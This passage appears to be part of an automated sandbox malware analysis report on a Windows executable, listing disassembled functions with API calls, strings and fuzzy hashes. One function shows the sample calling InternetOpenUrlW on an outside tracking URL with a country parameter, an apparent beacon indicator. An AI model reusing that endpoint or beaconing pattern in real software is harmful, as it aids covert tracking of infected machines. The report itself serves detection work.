API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: e6a92c96a1e9fdf56f5bc352c87485f8e7f320f972e9c2675893e6a14a246b5b
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 57F03736211500DBC629FF62E6909BFB7B6AFC4610310455FE68747590CF21A947DB71

Function 02472E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472E8E

Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471328
Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024730A1

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 02472EBE, 02472FEA, 02473059
&cc=DE, xrefs: 0247301B, 02473021, 0247307E

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: d5ccd31b2cbb2af03a9fe18a5c51409eb2b1ea8232e5f65add460cab39c645ed
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: CA5153A5E55344A8E320EFB0BC45B723378FF58712F10543BD528CB2B2E7A19944871E

Function 02498937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0249896A
__IsNonwritableInCurrentImage.LIBCMT ref: 02498A23

Strings

fB, xrefs: 02498A15, 02498A1E, 02498A2F
csm, xrefs: 02498A0D

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 5ca6f334394dd3f6877c4931c8ecc33140facd94952ab1d27af6a3bf6aac2051
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 8741D434A002489FCF10DF2DC884AAEBFA5AF46328F14816BE9159B391D7329A01CF91

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\wN8pQhRNnu.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\wN8pQhRNnu.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\wN8pQhRNnu.exe
API String ID: 2506810119-1545333726
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0249F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\wN8pQhRNnu.exe,00000104), ref: 0249F9BA
_free.LIBCMT ref: 0249FA85
_free.LIBCMT ref: 0249FA8F

Strings

C:\Users\user\Desktop\wN8pQhRNnu.exe, xrefs: 0249F9B1, 0249F9B8, 0249F9E7, 0249FA1F

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\wN8pQhRNnu.exe
API String ID: 2506810119-1545333726
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: d499d96f1402e211989b74375e3031a87a9e10ca23de15f59ada815345c43f70
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 7D317C71A00258EFDF21DF9A9C8099EBFFCEF99710B1140ABE804D7621D6709A44CB90

Function 0247C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0247C8DE

Strings

ios_base::badbit set, xrefs: 0247C8A1, 0247C8C1
ios_base::failbit set, xrefs: 0247C8AB
ios_base::eofbit set, xrefs: 0247C8B0

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: 049c6727811fb1aa356781be3b944feec525705c1a35b402c3ec987ade1b52c4
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 68F050B3C406086BCB04EA54CDC1BEF33989B06316F04806FDD62AB182EB789945CFA4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

pScheduler, xrefs: 00415DB2
version, xrefs: 00415D9F

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 024A5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024A5B8A
__alldvrm.LIBCMT ref: 024A5D8B
__alldvrm.LIBCMT ref: 024A5DAD

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: df72fd2d1c62846be8c75fdec26bbffb4d4cd5b66c90d805d6ba129b5335aa4c
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 78A15972D013869FEB26CF28C9A57AEBBE1EF65314F58816FD5859B381C3348941CB50

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 024AFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AFD9E

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: ed7d319149688fe1d7b3a0bbed2b2bc2aa4460cb3770df107cb724985efca93d
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: 3D41AF31A00600ABDB226FBE8C60BAF3B66EF31730F11061FF42AD66D0D77644458BA1

Function 024A6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024A047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024A6B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024A6BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024A6BEC
__freea.LIBCMT ref: 024A6BF5

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 93e2e34bc3baba9a00dc80a189d8fe73fa1c5d60f0dd9a58292053eb7113b7da
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: FA31D072A0121AABDF24CF65CC50DEF7BA9EF50714B0A426EEC14D7290EB35D951CB90

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 02499330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0249934A

Part of subcall function 02499297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024992C6
Part of subcall function 02499297: ___AdjustPointer.LIBCMT ref: 024992E1

_UnwindNestedFrames.LIBCMT ref: 0249935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02499370
CallCatchBlock.LIBVCRUNTIME ref: 02499398

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 498d1580d0e3659feca5257187e3c93cc0b12885d0de557d3f13b2bc4cda5061
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: EF01D772100148BBDF125E96CC41EEB7F6EEF48754F05441DFE5896120D776E861EBA0

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 024A5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378), ref: 024A51C8
GetLastError.KERNEL32(?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024A2213), ref: 024A51D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024A51E2

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 0ce62b76c3fdf1b0970068b8dd50a63813749d5e11aeb4b2c24ffea2a9e3c617
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 52017036E022226BD7214F789D54E777B98AF56F617500231FC05D7241C720C901CAE4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 02496395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024963AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024963C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024963DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024963F3

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: d319f3877fd5d38c43cc6a368d3d55f140f1a849d9a8719ef83febf945162c43
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 7E018636600114BBCF26EEA5D854AAF7B9E9F45750F01005BEC21AB391DAB1ED11CAA0

Function 02492B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

